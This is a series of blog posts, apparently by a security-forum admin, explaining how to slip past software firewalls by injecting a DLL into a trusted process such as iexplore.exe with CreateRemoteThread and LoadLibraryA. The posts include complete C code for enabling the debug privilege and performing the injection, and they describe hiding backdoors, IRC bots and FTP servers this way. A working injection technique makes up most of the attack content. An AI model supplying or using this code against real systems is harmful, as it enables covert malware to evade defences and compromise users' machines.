ok, as promised I will now explain a bit more about how CreateRemoteThread can be used to bypass software firewalls.

MSDN gives the following prototype for the function:

HANDLE CreateRemoteThread(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);

The key parameters here are hProcess - this will be a handle to the process we wish to inject into; lpStartAddress - this is an address to a routine that will be executed in the newly created thread, and lpParameter - this will be a parameter to pass to the thread function.

We will use a sneaky trick that will allow us to load an entire dll into the target process using this api...

The lpStartAddress function pointer has the type:

DWORD WINAPI ThreadProc(
LPVOID lpParameter
);

This means the function must have a single parameter. By some chance, the following winapi used to load dll's into a process' memory space also takes a single parameter:

HINSTANCE LoadLibrary(
LPCTSTR lpLibFileName
);

Also by some fortune, we are guaranteed that the function LoadLibrary exists in the target process' memory space, since all processes in windows load kernel32.dll upon initialisation - and even better than this, it will live at exactly the same memory location for all processes...

This leads us to the following strategy:

1) Use the api VirtualAllocEx and WriteProcessMemory to allocate memory in the target process and write the path name of a dll we wish to inject into the target process (e.g. c:\windows\evil.dll);

2) Get a pointer to LoadLibraryA (the "A" means we use the ANSI version, not UNICODE);

3) Use the api CreateRemoteThread to start a new thread that calls LoadLibraryA with a pointer to the dll path.

Our final point of good fortune is that LoadLibrary will call the function DllMain from our injected dll, once it has been loaded into the target process.

This means that the dll can run as a normal executable once inside the target process and is in no way limited in it functionality.

All sounds too easy? There is one other minor issue, to use CreateRemoteThread against system processes (e.g. explorer.exe), you need to have a special security priviledge known as "debug privs". Fortunetely we can gain these using another special api "AdjustTokenPrivileges". I won't go into the details of how this works, but the code below should explain this.

BOOL AdjustTokenToDebug()
{
// find the LUID of debug privilege token
LUID tLUID;
BOOL diditwork=LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tLUID);
if(diditwork!=0)
{
HANDLE hProcess=GetCurrentProcess();
if(hProcess!=0)
{
// Open the token for adjusting and querying
// (if we can - user may not have rights):
HANDLE hToken;//=new HANDLE;
diditwork=OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken);
//DWORD x=GetLastError();
if(diditwork!=0)
{
// time to adjust debug privs
TOKEN_PRIVILEGES tTP;
TOKEN_PRIVILEGES tTPOld;
tTP.PrivilegeCount=1;
tTP.Privileges->Attributes=SE_PRIVILEGE_ENABLED;
tTP.Privileges->Luid.HighPart=tLUID.HighPart;
tTP.Privileges->Luid.LowPart=tLUID.LowPart;

// now we adjust privs
DWORD lengthReturned;
diditwork=AdjustTokenPrivileges(hToken,0,&tTP,sizeof(tTP),&tTPOld,&lengthReturned);
//x=GetLastError();
CloseHandle(hToken);
if(diditwork!=0)
{
return 1;
}
}
}
}
return 0;
}

You can use the function AdjustTokenToDebug to provide your injection app the correct privileges to inject into any system process.

Ok, so now we can finally see how injection works...here's a full code snippet:

#include "stdafx.h"
#include "install hooks.h"
#include "Tlhelp32.h"
#include "Psapi.h"

#pragma comment( lib, "Psapi" )

int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{

// 1st of all we need god privs to do process injection
AdjustTokenToDebug();

// dll to inject

char dll[] = "myDll.dll";
char temp[500];
GetCurrentDirectoryA(500, temp);

strcat(temp, "\\");
strcat(temp, dll);

char processName[] = "iexplore.exe";
DWORD targetPID = GetProcessPIDByName(processName);
if(targetPID==0){return 0;}

// inject trojan dll into explorer.exe
HANDLE targetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS,false,targetPID);

int x = strlen(temp);
SIZE_T numWritten = 0;
void* lpTargetMemory = VirtualAllocEx(targetProcessHandle,0,strlen(temp),0x1000,0x4);
BOOL diditWrite = WriteProcessMemory(targetProcessHandle,lpTargetMemory,temp,strlen(temp),0);
DWORD ThreadID;
HMODULE dllInjectHandle=NULL;

HANDLE hThread=CreateRemoteThread(targetProcessHandle,0,0,(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32"),"LoadLibraryA"),lpTargetMemory,0,&ThreadID);

return FALSE;
}

DWORD GetProcessPIDByName(char moduleName[256])
{

//get pid
DWORD idProcess[256];
DWORD cb = sizeof(idProcess);
DWORD cdNeeded;
BOOL didigetlist = EnumProcesses((DWORD*)&idProcess, cb,&cdNeeded);
char szProcessName[256] = "unknown";
int noProcess=cdNeeded/sizeof(DWORD);
int searchPID=0;
int i=0;
for (i=0; i lessthan noProcess; i++ )
{
HANDLE hProcess=OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ,FALSE,idProcess[i]);
if (NULL != hProcess)
{
HMODULE hMod;
DWORD cbNeeded;
BOOL didnumwork = EnumProcessModules( hProcess, &hMod, sizeof(hMod),&cbNeeded);
DWORD y=GetLastError();
if ( didnumwork )
{
DWORD diditwork=GetModuleBaseName( hProcess, hMod, szProcessName,sizeof(szProcessName) );
_strlwr((char*)&szProcessName);
DWORD x = GetLastError();
}
}

if(stricmp(szProcessName,moduleName)==0)
{
searchPID=idProcess[i];
break;
}
}
return searchPID;
}

This will allow you to load any dll into any running process. Next time we will look at how we can use a dll to hold a typical malware program - e.g. a backdoor, irc bot etc... and how any normal application can be converted into a dll.

Tibbar.

Many home users rely on a software firewall to protect them from malicious hackers on the outside. While many firewalls do a reasonable job on blocking the outside attacker, most are quite weak at protecting the user from a malicious program that is intended to provide a backdoor into your system.

Such programs could include remote logins (telnet style), ircbots (to form part of a botnet) and ftp servers (to allow the attacker to use your computer to host illegal content).

The typical firewall works by suspending execution of programs you run, right at the moment the program requests use of the function WSAStartup (the winsock function that initialises use of the socket library (sockets are used for communication)).

It then presents the user with a dialog asking if it is ok that this program accesses the internet. Of course, this sounds quite safe, but what if the malicious program is able to hide itself within another existing application, that already has internet access...iexplorer, for example...

If that were possible, your software firewall would not be of much help.

Unfortuntely, it is possible, primarily using a windows api called "CreateRemoteThread". This ingenious invention of Microsoft allows you to create a new thread in another application. I am sure it has legitimate uses, but imho it is a dangerous api that should be subject to greater security priviledges.

Anyway, using this api command it is possible to "inject" any type of application into an already running application. This means the attacker can inject all of their ircbots, ftpservers and backdoors into a trusted process, and bypass most firewalls.

It also has the added advantage for the attacker that the end user will be oblivious to the extra applications that are running when they look on the taskmgr.

Anyway, I gotta head off to work.

Tonight, I will give some example code of how this actually works.

Well, i've decided to start a blog...

Some of you may know me from the site www.governmentsecurity.org, I'm on the admin team there and enjoy security software development in my spare time.

The plan with this blog, is to share an insight into the things I code, and provide the community an understanding of how malware works, and what security software currently is missing (to protect us).

I will also be releasing lots of code snippets here which typically would never been seen in the public eyes (the stuff that blackhats share in private sites).

My hope is that by sharing this kind of information, it will help the security community improve their products and make the end user a little bit safer...

See you around.

Tibbar.